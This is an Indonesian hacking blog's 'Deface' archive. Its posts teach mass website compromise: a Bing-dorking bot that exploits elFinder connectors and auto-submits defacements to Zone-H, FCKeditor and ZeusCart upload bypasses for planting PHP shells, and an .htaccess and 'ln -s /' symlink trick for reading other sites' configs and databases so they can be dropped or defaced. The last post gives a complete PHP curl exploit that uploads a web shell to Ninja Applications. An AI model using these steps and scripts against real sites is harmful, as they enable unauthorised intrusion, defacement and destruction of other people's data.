Deface

Bot Bing Dorker + Auto Exploit + Zone-H Submit Exploit elFinder Hosting Nazuka

November 16, 2016 by Jack Wilder 7 Comments

Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha 😀 .

Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security.
Yup, hosting gratis nazuka ternyata menyimpan “backdoor” yang cukup fatal di lokasi /_file-manager/php/connector.php . Bakal dapet banyak kalo niat deface.
Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.

Untuk script nya bisa download disini :

Bot Auto Tusbol Nazuka

Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro 🙂

Oh iya, disini ada beberapa parameter yang harus diubah.

$zh = “zafk1el”;

Itu nick zone-h. Silahkan diganti sendiri ya.

Lalu bagian

$isi_nama_doang =

Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.

Cara pakainya gimana bang ?

Gampang banget.

Tinggal masukkan perintah

php namafile.php

Lalu enter. Selanjutnya masukkan bing dork nya.

PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google.

Thanks.

Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit

September 26, 2016 by Jack Wilder 1 Comment

Yoo.. kali ini mau share aja autoexploit Lokomedia buatan anak IDX. Yup, tools ini dibuat untuk melakukan mass exploit pada CMS berbasis Lokomedia yang berfungsi untuk melakukan auto inject , auto crack password, serta admin finder. [Read more…] about Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit

FCKeditor Bypass Shell Upload With Burp Suite Intercept

August 8, 2016 by Jack Wilder 9 Comments

Kali ini saya akan share cara melakukan bypass shell upload pada web yang menggunakan FCKeditor. Nah biasanya kan banyak tuh yang share cara deface pake fckeditor, tapi rata rata yang diupload cuma file txt paling mentok ya html. Jadi gak bisa upload php. Pake tamper data juga gagal. Nah disini saya akan share cara bypass uploadnya sehingga kita bisa mengupload file .php . [Read more…] about FCKeditor Bypass Shell Upload With Burp Suite Intercept

Simple Bypass Internal Server Error Symlink 2016

May 12, 2016 by Jack Wilder 16 Comments

Sebenarnya trik ini lumayan simpel dan sudah banyak yang tau. Namun malah jarang yang share. Cara melakukan bypass Internal Server Error saat melakukan symlink website. Sehingga nantinya kita tetap bisa melihat isi konfigurasi dari web tetangga. 😀

Oke, jadi saya anggap kalian sudah tanam shell, siap symlink, dan dipastikan web nya bisa di symlink.

Namun ketika di klik symlink terdapat pesan Internal Server Error.

Cara bypass nya cukup simple.

Pertama, buat folder baru. terserah kasih nama apa.

Disini saya membuat folder dengan nama ‘ linuxsec ‘.

Nah, masuk ke direktori ‘linuxsec’ , lalu buat file .htaccess dengan isi berikut :

Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php

Selanjutnya , di shell command masukkan perintah berikut :

ln -s / shu

Perintah ini untuk membuat symbolic link dari folder root ( / ) , ke folder shu .

Dan coba kita buka folder ” linuxsec/shu ” di browser. Sesuaikan dengan nama folder yang kalian buat dan folder symlink nya.

Nah.. tapi pas dibuka folder home, dimana folder tersebut berisi user user dari web satu server , masih forbidden .

Cara mengatasi nya, kalian lihat pola di shell nya.

Dalam kasus saya, web akan diletakkan di /home/$user/public_html/

Dan seperti percobaan symlink yang pertama, dimana kita mendapat notice Internal Server Error, tentu kita juga sudah tau username nya.

Tinggal diganti $user dengan username situs yang ingin kita ‘telanjangi’ .

Cek database nya..

Nah sekarang terserah mau diapain. Mau di drop apa di deface .

Oke sekian tutorial kali ini, semoga bermanfaat.

Exploit ZeusCart CMS dan Upload Shell

September 18, 2015 by Jack Wilder 2 Comments

Kali ini mau share sedikit tutorial Exploit ZeusCart CMS dan Upload Shell. Exploit ini vuln untuk versi ZeusCart 4.0 . Oke langsung saja ke tutorial. Cukup mudah kok.
Dork : use your brain.
Exploiter : download

Oke , setelah menemukan target anggap kalian sudah login ke web korban dengan user dan password baru kalian.
Lalu pergi ke tempat tambah iklan .
http://localhost/zeuscart/admin/?do=homepageads
Gunakan firefox untuk melakukan tamper data.
Upload shell yang sudah diubah ekstensi nya ke bentuk jpg.

Jika sudah, shell kalian akan terletak di
http://localhost/zeuscart/images/homepageads/randomnameshell.php

Jika kurang paham bisa dilihat di video berikut :

Sekian tutor kali ini semoga bermanfaat.

Exploit Ninja Application Remote Code Vulnerability

September 16, 2015 by Jack Wilder Leave a Comment

Kali ini saya akan share exploit yang lumayan poluler yaitu Exploit Ninja Application Remote Code Vulnerability. Oke langsung saja ke tutorial.
Google dorks : use your brain !
Vuln Code : {“jsonrpc” : “2.0”, “result” : null, “id” : “id”, “cleanFileName” : “”}
Victim : /ninja-applications/fufu/controllers/uploader/upload.php

Exploit Code :

<?php
$url = “http://localhost/ninja-applications/fufu/controllers/uploader/upload.php”;
$post = array
(
“file” => “@shell.jpg”,
“name” => “shell.php”
);
$ch = curl_init (“$url”);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

Shell access : localhost/uploads/temp/fufu(random code)shell.php . ex: fufu55f9730a4ea30sh.php

Pertama, dorking dulu di google.

Lalu cek urlnya : http://localhost/ninja-applications/fufu/controllers/uploader/upload.php

Jika ada vuln code seperti di ss, berarti situs tersebut bisa dieksekusi.

Tinggal di exploit dengan exploit code php diatas. Gunakan xampp di Windows atau langsung di Linux.

Tinggal diakses shell nya sesuai nama yang tertera di terminal.

Mudah bukan ? Sekian tutor kali ini semoga bermanfaat. 🙂